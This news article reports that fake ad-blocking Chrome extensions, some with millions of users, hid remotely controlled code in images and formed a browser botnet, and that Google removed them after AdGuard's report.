It is really unbelievable that an ad blocker could turn out to be malware, but it as apparently true. Andrey Meshkov, the co-founder of ad-blocker AdGuard, recently got curious about the number of knock-off ad blocking extensions available for Google’s popular browser Chrome, according to Vice Motherboard.
Meshkov noticed the extensions were deliberately styled to look like legitimate ad blockers, but he wondered why they existed in the first place. So he downloaded one to take a closer look.
“Basically I downloaded it and checked what requests the extension was making,” Meshkov told Motherboard over the phone. “Some strange requests caught my attention.”
Meskhov noticed almost immediately that the ad blocker downloaded from the Chrome store had code hidden inside an image that had been loaded from a remote command server. He says this gives the creator the ability to change its functions without updating anything.
“Basically, this is a botnet composed of browsers infected with the fake Adblock extensions,” AdGuard wrote in its report, according to Engadget. “The browser will do whatever the command center server owner orders it to do.”
This action is against Google’s policies, and after bMeskhov wrote about his discovery, that included a number of examples that had millions of users, Google removed the fake extensions from their Chrome store.
This is the full list, according to Meskhov.
AdRemover for Google Chrome™ (10M+ users)
uBlock Plus (8M+ users)
Adblock Pro (2M+ users)
HD for YouTube™ (400K+ users)
Webutation (30K+ users)
Meskhov says the fake extensions can be used for a number of dangerous actions, other than collecting personal information and browsing habits. These extensions can alter the appearance of pages, scrape information from the user, or load additional extensions that a user hasn’t installed. All in all, not good.
Yan Zhu, a software engineer who works for the privacy-conscious browser Brave, told Motherboard Google has a history of approving sketchy extensions to its store.
“For instance, the extension could probably man-in-the-middle all the requests coming from your browser, but it can’t, for instance, read your browser’s encrypted password database, because that is not a privilege that extensions can have,” Zhu explained over a Twitter direct message.